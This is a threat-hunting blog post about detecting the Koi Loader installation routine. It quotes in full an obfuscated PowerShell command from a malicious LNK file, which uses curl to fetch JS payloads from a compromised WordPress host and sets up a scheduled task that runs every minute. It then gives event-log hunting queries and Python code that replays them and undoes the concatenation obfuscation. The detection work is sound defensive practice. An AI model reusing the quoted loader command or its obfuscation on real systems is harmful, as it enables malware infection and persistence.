175. Hunting Koi Loader Installation Routine

Hello everyone!

Malware installation routines are noisy, most of the time. What does that mean for us? We can turn this noise into detection and hunting ideas!

Let's look at Koi Loader. It's commonly delivered with the help of malicious LNK files, like this one, which executes the following command:

powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + '%ProgramData%\' + ('nblxsl7b2fdze5.js wg3c86ft8'); & ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; & ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L 'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; mv e8p1xhlnt1xd wg3c86ft8.js; . ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8;

As you can see, there are lots of detection and hunting opportunities here! Let's start with PowerShell being abused to create a scheduled task:

event_type: "processcreatewin"

AND

proc_file_name: "powershell.exe"

AND

cmdline: ("create" AND "minute")

Next thing, abusing curl.exe to download a malicious file from a compromised WordPress website:

event_type: "processcreatewin"

AND

proc_file_name: "curl.exe"

AND

cmdline: "wp-content"

Finally, let's hunt for suspicious JS files executed from %ProgramData% subfolders:

event_type: "processcreatewin"

AND

proc_file_name: "wscript.exe"

AND

cmdline: ("programdata" AND "*.js")
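To show how these three queries behave on actual telemetry, here is an added Python example (not code from the original post) that runs them over a handful of constructed process-creation events, including the Koi Loader one-liner quoted above. It also adds a fourth check that is not one of the post's queries: it joins the PowerShell string concatenations ('sc'+'hta' + 'sks', 'cu'+'r'+'l.ex'+'e') so the hidden tokens become contiguous, which is exactly why the raw command line never contains "schtasks" and the post matches on "create" AND "minute" instead. The field names (event_type, proc_file_name, cmdline) follow the post's queries; the curl.exe and wscript.exe child events are assumptions about what the one-liner and its scheduled task spawn, not captured events.

```python
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# The Koi Loader PowerShell one-liner quoted in the post, kept verbatim
# (defanged hXXps:// and [.] exactly as on the page).
KOI_POWERSHELL = (
    "powershell.exe -command $q7hl1gh07lmh4rm = 'ws'+'cr'+'ip' + 't ' + "
    "'%ProgramData%\\' + ('nblxsl7b2fdze5.js wg3c86ft8'); "
    "& ('cu'+'r'+'l.ex'+'e') -sL -o nblxsl7b2fdze5.js "
    "'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php'; "
    "& ('cur'+'l.e'+'xe') -s -o e8p1xhlnt1xd -L "
    "'hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/pseudophilanthropicalgjxR.php'; "
    "mv e8p1xhlnt1xd wg3c86ft8.js; "
    ". ('sc'+'hta' + 'sks') /create /sc minute /f /mo 1 /tr $q7hl1gh07lmh4rm /tn wg3c86ft8;"
)

# Constructed sample telemetry. The curl.exe and wscript.exe lines are
# assumptions about the child processes the one-liner and its scheduled
# task would create; the last three events are benign noise that must not match.
SAMPLE_EVENTS: List[Event] = [
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": KOI_POWERSHELL},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl.exe -sL -o nblxsl7b2fdze5.js "
                "hXXps://ayeorganization[.]com/wp-content/uploads/2019/04/goosehouseel.php"},
    {"event_type": "processcreatewin", "proc_file_name": "wscript.exe",
     "cmdline": "wscript C:\\ProgramData\\nblxsl7b2fdze5.js wg3c86ft8"},
    {"event_type": "processcreatewin", "proc_file_name": "powershell.exe",
     "cmdline": "powershell.exe -command Get-ScheduledTask | Where-Object State -eq Ready"},
    {"event_type": "processcreatewin", "proc_file_name": "curl.exe",
     "cmdline": "curl.exe -s https://example.invalid/api/health"},
    # Right image and path, wrong event type: the post's queries are scoped to process creation.
    {"event_type": "networkconnectwin", "proc_file_name": "wscript.exe",
     "cmdline": "wscript C:\\ProgramData\\nblxsl7b2fdze5.js wg3c86ft8"},
]

# 'a'+'b' -> 'ab', and ('x') -> 'x'. Applied repeatedly until the command
# line stops changing, so chains of any length collapse into one literal.
_CONCAT_RE = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")
_PAREN_RE = re.compile(r"\(\s*'([^']*)'\s*\)")


def flatten_concatenation(cmdline: str) -> str:
    """Reassemble single-quoted PowerShell string concatenations."""
    previous, current = None, cmdline
    while previous != current:
        previous = current
        current = _CONCAT_RE.sub(lambda m: f"'{m.group(1)}{m.group(2)}'", current)
        current = _PAREN_RE.sub(lambda m: f"'{m.group(1)}'", current)
    return current


def _fields(event: Event) -> Tuple[str, str]:
    return event.get("proc_file_name", "").lower(), event.get("cmdline", "").lower()


def powershell_schtasks_minute(event: Event) -> bool:
    name, cmd = _fields(event)
    return name == "powershell.exe" and "create" in cmd and "minute" in cmd


def powershell_concat_schtasks(event: Event) -> bool:
    # Added check: match the token only visible after flattening the concatenation.
    name, cmd = _fields(event)
    return name == "powershell.exe" and "schtasks" in flatten_concatenation(cmd)


def curl_wp_content(event: Event) -> bool:
    name, cmd = _fields(event)
    return name == "curl.exe" and "wp-content" in cmd


def wscript_programdata_js(event: Event) -> bool:
    # ".js" as a substring approximates the post's *.js wildcard.
    name, cmd = _fields(event)
    return name == "wscript.exe" and "programdata" in cmd and ".js" in cmd


RULES: List[Tuple[str, Callable[[Event], bool]]] = [
    ("powershell_schtasks_minute", powershell_schtasks_minute),
    ("powershell_concat_schtasks", powershell_concat_schtasks),
    ("curl_wp_content", curl_wp_content),
    ("wscript_programdata_js", wscript_programdata_js),
]


def hunt(events: List[Event]) -> List[Tuple[str, Event]]:
    """Return (rule_name, event) for every process-creation event a rule matches."""
    hits = []
    for event in events:
        if event.get("event_type") != "processcreatewin":
            continue
        for rule_name, predicate in RULES:
            if predicate(event):
                hits.append((rule_name, event))
    return hits


if __name__ == "__main__":
    for rule_name, event in hunt(SAMPLE_EVENTS):
        print(f"{rule_name:28} {event['proc_file_name']}: {event['cmdline'][:70]}")
```

The flattening step is deliberately narrow (single-quoted literals, `+`, and parentheses) so that it stays predictable; it is there to demonstrate why keyword hunting on the raw cmdline has to fall back on the schtasks arguments rather than its name.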

See you tomorrow!
